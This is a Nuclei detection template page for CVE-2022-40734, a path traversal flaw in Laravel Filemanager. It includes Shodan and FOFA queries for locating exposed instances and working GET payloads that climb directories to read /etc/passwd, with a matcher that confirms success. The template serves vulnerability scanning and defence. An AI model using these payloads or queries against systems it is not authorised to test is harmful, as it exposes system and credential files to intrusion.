Skip to content

Laravel Filemanager v2.5.1 - Local File Inclusion

ID: CVE-2022-40734

Severity: medium

Author: arafatansari

Tags: cve,cve2022,laravel,unisharp,lfi,traversal

Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.

id: CVE-2022-40734
info:
name: Laravel Filemanager v2.5.1 - Local File Inclusion
author: arafatansari
severity: medium
description: |
Laravel Filemanager (aka UniSharp) through version 2.5.1 is vulnerable to local file inclusion via download?working_dir=%2F.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, sensitive data exposure, and remote code execution.
remediation: |
Upgrade to a patched version of Laravel Filemanager v2.5.1 or apply the recommended security patches provided by the vendor.
reference:
- https://github.com/UniSharp/laravel-filemanager/issues/1150
- https://nvd.nist.gov/vuln/detail/CVE-2022-40734
- https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966
- https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score: 6.5
cve-id: CVE-2022-40734
cwe-id: CWE-22
epss-score: 0.10627
epss-percentile: 0.95035
cpe: cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: unisharp
product: laravel_filemanager
shodan-query:
- http.html:"Laravel Filemanager"
- http.html:"laravel filemanager"
fofa-query: body="laravel filemanager"
tags: cve,cve2022,laravel,unisharp,lfi,traversal
http:
- method: GET
path:
- "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
- "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
stop-at-first-match: true
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
# digest: 4a0a004730450220156310d69f8ca32abc1f99e0e04c37d092322f3bbd8594607205ca8628c75f92022100d08074a20c8730f8a32a06e48786efdc2785943abaf6385118657077ffd03392:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-40734.yaml"

View on Github